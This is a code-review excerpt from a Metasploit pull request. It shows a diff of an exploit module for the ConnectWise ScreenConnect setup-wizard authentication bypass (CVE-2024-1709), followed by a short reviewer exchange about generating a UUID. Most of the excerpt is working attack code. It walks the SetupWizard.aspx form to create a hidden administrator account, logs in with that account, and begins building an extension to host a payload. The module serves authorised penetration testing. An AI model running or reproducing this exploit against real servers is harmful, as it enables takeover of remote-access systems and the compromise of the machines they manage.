modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb

```diff
@@ -0,0 +1,427 @@
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')
+    end
+
+    viewstate, viewstategen = get_viewstate(res)
+    unless viewstate && viewstategen
+      fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')
+    end
+
+    #
+    # 3. Create a new administrator account.
+    #
+    admin_username = Rex::Text.rand_text_alpha_lower(8)
+    admin_password = Rex::Text.rand_text_alphanumeric(16)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$userNameBox' => admin_username,
+        'ctl00$Main$wizard$emailBox' => "#{admin_username}@#{Rex::Text.rand_text_alpha_lower(8)}.#{Rex::Text.rand_text_alpha_lower(3)}",
+        'ctl00$Main$wizard$passwordBox' => admin_password,
+        'ctl00$Main$wizard$verifyPasswordBox' => admin_password,
+        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from create account step in setup wizard.')
+    end
+
+    print_status("Created account: #{admin_username}:#{admin_password} (Note: This account will not be deleted by the module)")
+
+    #
+    # 4. Log in with this account to get an authenticated HTTP session.
+    #
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'Administration'),
+      'keep_cookies' => true,
+      'authorization' => basic_auth(admin_username, admin_password)
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to login with admin credentials.')
+    end
+
+    if res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}
+      anti_forgery_token = Regexp.last_match(1)
+    else
+      # The antiForgeryToken is not present in older versions of ScreenConnect (Tested with 20.3.31734).
+      print_warning('Could not locate anti forgery token after login with admin credentials.')
+      anti_forgery_token = ''
+    end
+
+    #
+    # 5. Create an extension to host the payload.
+    #
+
+    # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want.
+    plugin_guid = [8, 4, 4, 4, 12].map { |a| Rex::Text.rand_text_hex(a) }.join('-')
```

Comment:
This generates a random UUID using Ruby's PRNG `Random` class.
```suggestion
    Faker::Internet.uuid
```

Reply:
Implemented via [fe88673](https://github.com/rapid7/metasploit-framework/pull/18870/commits/fe8867356e17780a6f0fec68ea1f9b345a0c71ab).